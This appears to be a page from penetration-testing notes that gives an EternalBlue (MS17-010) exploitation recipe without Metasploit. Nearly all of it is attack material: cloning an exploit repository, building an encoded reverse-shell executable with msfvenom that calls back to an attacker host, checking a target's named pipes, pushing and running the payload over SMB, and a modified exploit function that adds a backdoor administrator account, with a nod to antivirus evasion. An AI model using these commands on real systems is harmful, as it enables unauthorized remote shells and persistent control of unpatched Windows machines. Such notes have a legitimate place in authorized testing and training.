MS17-010

EternalBlue MS 17-010 exploiting ways without Metasploit.

GitHub - helviojunior/MS17-010: MS17-010GitHub

With Executable

$ git clone https://github.com/helviojunior/MS17-010.git
$ cd MS17-010

$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.1 LPORT=80 EXITFUNC=thread -f exe -a x86 --platform windows -e x86/shikata_ga_nai -i 7 -o reverse.exe

$ python checker.py 192.168.1.2

Trying to connect to 192.168.1.2:445
Target OS: Windows 5.1
The target is not patched

=== Testing named pipes ===
spoolss: STATUS_OBJECT_NAME_NOT_FOUND
samr: Ok (32 bit)
netlogon: Ok (32 bit)
lsarpc: Ok (32 bit)
browser: Ok (32 bit)

python send_and_execute.py <ip> <executable_file> [port] [pipe_name]

$ python send_and_execute.py 192.168.1.2 reverse.exe 445 browser

With Adding User

If there is an AV, you can not upload executable file. Instead of uploading, you can create an administrator account. Or you can do AV evasion. :)

https://www.exploit-db.com/exploits/42315

Change smb_pwn function content is to below.

def smb_pwn(conn, arch):
	smbConn = conn.get_smbconnection()
	
	print('creating file c:\\pwned.txt on the target')
	tid2 = smbConn.connectTree('C$')
#	fid2 = smbConn.createFile(tid2, '/pwned.txt')
	service_exec(conn, r'cmd /c net user cel1s0 password /add')
	service_exec(conn, r'cmd /c net localgroup administrators cel1s0 /add')  
#	smbConn.closeFile(tid2, fid2)
	smbConn.closeFile(tid2)
	smbConn.disconnectTree(tid2)

PreviousGMSA NextUseful PS Scripts

Last updated 4 years ago